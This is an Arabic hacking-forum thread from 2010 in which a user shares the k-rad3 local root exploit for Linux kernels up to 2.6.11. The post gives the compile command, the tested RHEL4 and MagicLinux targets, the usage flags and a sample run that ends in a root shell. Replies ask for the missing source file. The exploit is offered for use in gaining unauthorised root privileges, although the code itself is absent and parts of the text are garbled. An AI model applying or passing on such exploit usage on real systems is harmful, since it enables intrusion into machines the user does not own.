:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم أدوات واندكـسات الإختراق (http://www.vbspiders.com/vb/forumdisplay.php?f=103)
-   -   لوكال روت تعطيك صلاحيات الروت k-rad3 (http://www.vbspiders.com/vb/showthread.php?t=27781)

MATRIX ALGERIA 04-19-2010 04:10 PM
لوكال روت تعطيك صلاحيات الروت k-rad3
 
كود PHP:
gcc -o k-rad3 k-rad3.-static -O2  
*  
tested succeed :  
on default installed RHEL4(2.6.9-5.EL and 2.6.9-5.ELsmp)  
2.6.9-5.EL ./k-rad3 -p 2  
2.6.9-5.ELsmp ./k-rad3 --p 7  
on default installed maglic linux 1.2  
MagicLinux 2.6.9 #1 ./k-rad3 -t 1 -p 2  
*  
thank watercloud tested maglic linux 1.2  
thank eist provide RHEL4 to test  
thank sd <sd@fucksheep.orgshare his stuff.  
thank xfocus xfocuss firends  
*  
*  
TODO:  
* CASE 1: use stack 0xc0000000  
* CASE 2CONFIG_X86_PAE define ,but cpu flag no pse  
*  
*[*****7@MagicLinux ~]$ ./k-rad3 -h  
*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ]  
*[ Discovered Jan 2005 by sd <sd@fucksheep.org> ]  
*[ Modified 2005/9 by *****7 <*****7@xfocus.org> ]  
*  
*Usage: ./k-rad3  
* -s forced cpu flag pse  
* -a define CONFIG_X86_PAE,default none  
* -<numhave two kernel code,default 0  
* -<numalloc pages(4k) ,default 1. Increase from 1 to 7  
The higher number the more likely it will crash  
* -<num> default 0  
:THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192  
*  
*[*****7@MagicLinux ~]$ ./k-rad3 -t 1 -p 2  
*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ]  
*[ Discovered Jan 2005 by sd <sd@fucksheep.org> ]  
*[ Modified 2005/9 by *****7 <*****7@xfocus.org> ]  
*[+] try open /proc/cpuinfo .. ok!!  
*[+] find cpu flag pse in /proc/cpuinfo  
*[+] CONFIG_X86_PAE :none  
*[+] Cpu flagpse ok  
*[+] Exploit Way 0  
*[+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 n)  
*[+] thread_size 1 (:THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192  
*[+] idtr.base 0xc0461000 ,base 0xc0000000  
*[+] kwrite base 0xc0000000buf 0xbffed750,num 8196  
*[+] idt[0x7faddr 0xffc003f8  
*[+] j00 1u(k7 k1d!  
*[root@k-rad3 ~] #id  
*uid=0(rootgid=0(rootgroups=500(*****7

Dr.NaNo 05-08-2010 06:52 AM
مشكور ياغالي واصل تميزك

بالتوفيق

Dr-j0k 06-13-2010 04:57 PM
ضعه في ملف مرفق اخي name.c

dahapp 10-02-2010 12:10 PM
[align=center]مشكووور اخى

http://store2.up-00.com/Sep10/G9N97885.gif[/align]

mt3b-op 10-21-2010 08:41 PM
صراحه انا ماعرف شي اذا هااذ لوكل جلطت مخي يا رجل

اشوف تطبيق اوامر على ملف بأسم k-rad3
طيب الملف وين.؟ او الكود الي داخل الملف؟

وضح اكثر موضوع محتاج مراجعه وتوضيح


الساعة الآن 06:19 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0